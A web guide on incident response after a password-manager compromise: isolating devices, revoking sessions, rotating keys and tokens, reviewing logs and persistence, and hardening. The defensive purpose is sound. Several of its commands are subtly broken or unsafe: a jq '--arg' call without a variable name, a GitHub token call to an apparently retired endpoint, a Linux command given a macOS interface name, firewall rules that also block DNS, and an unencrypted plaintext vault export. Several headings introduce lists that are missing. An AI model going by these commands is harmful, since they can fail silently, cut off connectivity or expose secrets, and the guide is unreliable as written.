Privacy Tools Guide

Immediately disconnect the compromised device from the network, revoke active sessions in your password manager’s web dashboard, and change your master password from a different, trusted device. Assume all stored passwords are compromised—start rotating the most critical ones (email, banking, admin accounts) immediately. For developers: regenerate all API keys, SSH private keys, and database credentials stored in the vault, audit access logs on affected services, and deploy updated credentials to production. Contact your password manager provider to report the incident and determine whether the breach was local (malware) or service-wide, then migrate to a new password manager with a new master password once threat is contained.

Immediate Actions (First 15 Minutes)

The first minutes after discovering a compromise are critical. Your priority is limiting damage and securing remaining accounts.

1. Disconnect Compromised Devices

If you suspect malware or keylogger involvement, immediately disconnect affected devices from the network:

# Linux/macOS - disable network interfaces
sudo ifconfig en0 down

# Or use Network Manager on Linux
nmcli device disconnect en0

Do not shut down the system if you plan to perform forensic analysis later—booting into safe mode or using a live USB to examine the system is preferable.

2. Revoke Active Sessions

Most password managers support session management. Revoke all active sessions immediately:

# Bitwarden - CLI example to list and revoke sessions
bw logout --session "YOUR_SESSION_KEY"
# Then log in fresh from a known-clean device

For 1Password, sign out of all devices through the web vault or mobile app settings.

3. Change Your Master Password

If you still have access to your account and suspect the master password may be compromised, change it immediately. Use a passphrase of at least 20 characters:

# Generate a secure passphrase using a password manager or CLI
openssl rand -base64 24 # generates a 32-character random string

Account-Specific Recovery Steps

After securing your password manager, systematically work through your stored credentials.

Prioritize High-Value Accounts

Start with accounts that grant access to sensitive systems:

  1. Cloud provider consoles (AWS, GCP, Azure)
  2. GitHub/GitLab repositories
  3. CI/CD pipelines
  4. Email accounts (especially primary email)
  5. Password managers (if nested)
  6. Financial accounts

Use Temporary Credentials Where Possible

For service accounts and API keys that cannot be quickly rotated, generate temporary credentials:

# AWS - create temporary credentials via STS
aws sts get-session-token --duration-seconds 43200

# Rotate GitHub personal access tokens via API
curl -X POST \
 -H "Authorization: token OLD_TOKEN" \
 https://api.github.com/authorizations \
 -d '{"note":"temp","scopes":["repo"],"expires_at":"2026-03-17T00:00:00Z"}'

Review Access Logs

Check for unauthorized access during the compromise window:

# GitHub - review security log
gh auth status
gh api -X GET /users/USERNAME/events | jq '.[] | select(.type == "PushEvent")'

# AWS - CloudTrail analysis
aws cloudtrail lookup-events --lookup-attributes attributeKey=EventSource,attributeValue=iam.amazonaws.com

Forensic Analysis

Understanding how the compromise occurred helps prevent future incidents.

Identify the Attack Vector

Common attack vectors for password manager compromises:

Check for Indicators of Compromise

Run these checks on affected systems:

# macOS - check for unknown login items
ls -la ~/Library/Application\ Support/com.apple.backgroundtaskmanagementagent/

# Linux - check cron jobs for persistence
crontab -l
cat /etc/crontab

# Windows - check scheduled tasks
schtasks /query /fo LIST /v

Review Recent Installations

Examine recently installed software, browser extensions, and system modifications:

# macOS - recently installed packages
ls -lat /Applications | head -20

# Linux - check dpkg/apt logs
grep "Commandline" /var/log/dpkg.log | tail -20

Rebuilding Your Security Posture

After securing accounts, implement stronger security measures.

Enable Multi-Factor Authentication

Ensure all critical accounts use hardware security keys or authenticator apps:

# Add SSH key authentication to GitHub
ssh-keygen -t ed25519 -C "your_email@example.com"
# Add the public key to GitHub via web interface or:
gh ssh-key add ~/.ssh/id_ed25519.pub

Implement Secret Rotation Policies

Set up automated rotation for critical secrets:

# Example: Rotate database credentials in Bitwarden
# Using Bitwarden CLI to generate and store new credentials
NEW_PASSWORD=$(openssl rand -base64 32)
bw get item "database-production" | jq --arg "$NEW_PASSWORD" '.login.password = $NEW_PASSWORD' | bw encode | bw edit item -

Consider Architecture Changes

Evaluate whether your current password manager meets your security requirements:

Prevention Strategies

Implement these practices to reduce future risk:

Regular Security Audits

Quarterly review of your credential inventory:

# Bitwarden - export and audit your vault
bw export --format json --output vault-export.json
# Then analyze with jq
cat vault-export.json | jq '[.[] | select(.login.password | length < 16)] | length'

Device Security Hardening

Secure the devices you use to access your password manager:

Network Security

Isolate your password manager access:

# Use a VPN when accessing password managers on public networks
# Configure your firewall to restrict outbound connections
sudo ufw default deny outgoing
sudo ufw allow out to any port 443 # HTTPS only

Built by theluckystrike — More at zovo.one

Explore Our Developer Guides

© 2026 theluckystrike Developer Guides